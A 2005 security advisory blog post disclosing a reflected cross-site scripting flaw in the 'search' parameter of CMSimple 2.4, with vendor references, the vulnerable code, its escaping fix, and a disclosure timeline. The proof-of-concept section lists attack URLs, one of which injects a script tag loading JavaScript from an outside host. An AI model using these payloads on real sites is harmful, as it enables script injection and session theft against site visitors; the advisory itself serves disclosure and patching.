CMSimple 'search' variable XSS

Thursday, July 21, 2005
##############################################
CMSimple 'search' variable XSS
Vendor urL:http://www.cmsimple.dk/
Advisory:http://lostmon.blogspot.com/2005/07/
cmsimple-search-variable-xss.html
vendor fix:http://www.cmsimple.dk/
forum/viewtopic.php?t=2470
Vendor confirmed:YES exploit available:yes
OSVDB ID: 18128
Secunia: SA16147
BID: 14346
Securitytracker: 1014556
##############################################



CMSimple is a simple content management system; for the smart
maintenance of small commercial or private sites.
It is simple - small - smart!


CMSimple contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'search' variable upon submission to 'index.php' script.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

Index.php file contains only a include to cmsimple/cms.php file.


#############
VERSIONS
#############

CMSimple 2.4 and earlier versions


#############
Solution
#############

vendor fix:
http://www.cmsimple.dk/forum/viewtopic.php?t=2470

Fix:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;

should be replaced with:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));

Will be fixed in next beta.

#############
Timeline
#############

discovered: 13-07-2005
vendor notify:20-07-2005
vendor response:21-07-2005
vendor fix:21-07-2005
disclosure:21-07-2005


################
Proof of concept
################

http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>



http://[victim]/?function=search&search=[XSS-CODE]

http://[victim]/?&print&function=search&search=[XSS-CODE]

http://[victim]/?License&function=search&search=[XSS-CODE]

http://[victim]/?Resellers&function=search&search=[XSS-CODE]

http://[victim]/?&guestbook&function=search&search=[XSS-CODE]


###################### €nd #########################

Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...